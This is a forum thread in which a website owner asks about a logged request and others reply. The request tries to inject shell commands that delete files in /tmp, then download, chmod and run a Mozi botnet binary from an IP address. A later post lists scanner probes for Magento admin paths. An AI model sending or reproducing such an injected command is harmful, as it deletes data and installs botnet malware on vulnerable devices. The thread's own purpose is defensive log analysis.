ibmall 大佬有话说 : 2019-12-19 12:25:15
网站收到这样的请求有什么风险?
网站访问日志有一条这样的内容,请教大佬,有什么实际的风险吗?
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
ckqf 大佬有话说 : 2019-12-19 12:34:43
没风险,这个地址你打开估计就是个404页面 。
ibmall 大佬有话说 : 2019-12-19 12:42:14
ckqf 大佬有话说 : 2019-12-19 12:34
没风险,这个地址你打开估计就是个404页面 。
好的,
还有个疑问,通过这种方式真的能执行shell命令?
ckqf 大佬有话说 : 2019-12-19 12:44:45
ibmall 大佬有话说 : 2019-12-19 12:42
好的,
还有个疑问,通过这种方式真的能执行shell命令?
有shell注入漏洞的才会有风险。
pulpfunction 大佬有话说 : 2019-12-19 12:48:37
dj有这种网页的在线维护模式吗,flask是能把这个功能关了
ibmall 大佬有话说 : 2019-12-19 12:51:13
ckqf 大佬有话说 : 2019-12-19 12:44
有shell注入漏洞的才会有风险。
好的,多谢大佬 。
ibmall 大佬有话说 : 2019-12-19 12:53:27
pulpfunction 大佬有话说 : 2019-12-19 12:48
dj有这种网页的在线维护模式吗,flask是能把这个功能关了
这个我还不知道,我去查查
把你的友链放上了,暂时就那个位置,还没考虑好以后怎么布局合适。
pulpfunction 大佬有话说 : 2019-12-19 12:57:55
ibmall 大佬有话说 : 2019-12-19 13:53
这个我还不知道,我去查查
把你的友链放上了,暂时就那个位置,还没考虑好以后怎么布局合适。 …
不急啊大哥 我那都没有流量 哈哈 ,flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找shell.php .html什么的执行命令 也没见过这种网页输命令行的程序
ibmall 大佬有话说 : 2019-12-19 13:26:27
pulpfunction 大佬有话说 : 2019-12-19 12:57
不急啊大哥 我那都没有流量 哈哈 ,flask是运行错误能输密码进入Python shell .. 这个请求是不是直接找sh …
嗯,流量慢慢就有了。
每天都有不少 找 xxx.php 的请求,这个倒是不担心,网站一个php文件都没有
"GET /admin/" 302 –
"GET /" 200 14176
"GET /shop/admin/" 200 5648
"GET /store/admin/" 200 5648
"GET /magento/admin/" 200 5648
"GET /magento2/admin/" 200 5648
"GET /pub/errors/503.php" 200 5648
"GET /shop/pub/errors/503.php" 200 5648
"GET /store/pub/errors/503.php" 200 5648
"GET /magento/pub/errors/503.php" 200 5648
"GET /magento2/pub/errors/503.php" 200 5648
leven5 大佬有话说 : 2019-12-19 13:29:25
被扫了不用管:lol